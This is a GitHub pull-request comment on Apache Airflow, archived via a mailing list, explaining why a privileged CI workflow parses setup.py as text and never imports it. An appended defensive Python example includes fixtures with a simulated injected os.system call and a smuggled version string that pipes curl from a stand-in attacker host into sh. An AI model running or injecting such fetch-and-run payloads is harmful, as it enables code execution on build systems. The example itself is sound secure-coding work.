potiuk commented on pull request #20338: URL: https://github.com/apache/airflow/pull/20338#issuecomment-997374726
> Is this the right way to find version or is there any better way than this?

Yeah. This is the right one. There are a few things that are important:

1) We will always have one and only one version in setup.py. And we want to have exactly one "source of truth" for the version number, so we chose to use `setup.py` as the source of truth.

2) Since we are using Python, we potentially could do it differently - we could simply import the version from setup.py, but we deliberately do not want to do that. I will capture it in the ADR shortly, to document where it comes from, but whenever we build an image we should not execute any code that comes from the PR (because of security). This is extremely important, because we run "building images" in a special workflow, "pull_request_target", that has more permissions than the regular "PR workflow". The "setup.py" file might be changed in a PR, so if we import it (i.e. effectively execute Python top-level code) we could let some anonymous user inject code that has more permissions (and could, for example, make commits to our repository). That's why parsing the file with a regular expression and getting the version this way is a better option. I will capture that as an ADR shortly and explain in more detail.

--
This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
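The approach described in the comment above, as an added example that is not Airflow's own code: read `setup.py` as text and pull the version out with a regular expression, so that a `setup.py` modified in a pull request is never imported or executed by a `pull_request_target`-privileged workflow. The sample `setup.py` contents, the `version = '...'` assignment shape, the regular expressions and the function names are assumptions made for this example; the `os.system` line in the sample stands in for whatever a malicious PR might add at module level, and nothing in the sample is ever executed.

```python
"""Extract a package version from setup.py text without executing it.

Added example (not Airflow's code). Models a CI step that runs with elevated
permissions (pull_request_target) and must not execute PR-controlled Python.
"""
import re

# Constructed sample: setup.py as it might arrive in a pull request. The
# top-level os.system call simulates PR-injected code. Importing this module
# would run it with the workflow's token; parsing it as text does not.
SAMPLE_SETUP_PY = '''\
import os
# injected by a hostile PR: runs at import time with the CI token
os.system("echo pwned > /tmp/evidence")

version = '2.3.0.dev0'

setup(
    name="apache-airflow",
    version=version,
)
'''

# Constructed failure cases: two assignments, and a "version" that is really a
# shell payload (dangerous if the value is later interpolated into a docker tag
# or a shell command).
SAMPLE_TWO_VERSIONS = "version = '1.0.0'\nversion = '9.9.9'\n"
SAMPLE_SHELL_PAYLOAD = "version = '1.0.0; curl http://evil.example/x | sh'\n"

# Assumed assignment shape: a top-level, unindented  version = 'x.y.z'  line,
# single or double quoted. Indented `version=version,` inside setup() does not
# match because ^ with MULTILINE requires the line to start with "version".
VERSION_RE = re.compile(
    r"""^version\s*=\s*(['"])(?P<version>[^'"]+)\1\s*$""", re.MULTILINE
)

# Loose PEP 440-style allowlist for the extracted string. This is the check a
# practitioner wants: the regex above happily matches any quoted text, and the
# value usually flows into shell commands or image tags downstream.
RELEASE_ID_RE = re.compile(r"^\d+(\.\d+)*((a|b|rc)\d+)?(\.post\d+)?(\.dev\d+)?$")


def extract_version(setup_py_text: str) -> str:
    """Return the single version string assigned in setup_py_text.

    Raises ValueError if there is not exactly one version assignment or if the
    value does not look like a release identifier. Never evaluates the file.
    """
    found = [m.group("version") for m in VERSION_RE.finditer(setup_py_text)]
    if len(found) != 1:
        raise ValueError(
            f"expected exactly one top-level version assignment, found {len(found)}"
        )
    version = found[0]
    if not RELEASE_ID_RE.match(version):
        raise ValueError(f"version {version!r} is not a plain release identifier")
    return version


def version_if_safe(setup_py_text: str):
    """Convenience wrapper for CI scripts: the version, or None if the file
    should not be trusted (caller should fail the build, not fall back)."""
    try:
        return extract_version(setup_py_text)
    except ValueError:
        return None


if __name__ == "__main__":
    # Typical usage: read the checked-out file as text and print the version
    # for a later build step, e.g. an image tag. Here the constructed sample
    # stands in for open("setup.py").read().
    print(extract_version(SAMPLE_SETUP_PY))
```

The two checks after the match matter as much as the decision not to import: insisting on exactly one assignment defends against a PR that adds a second `version = ...` line to steer the build, and the release-identifier allowlist stops a quoted string from smuggling shell metacharacters into whatever command consumes the version next.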
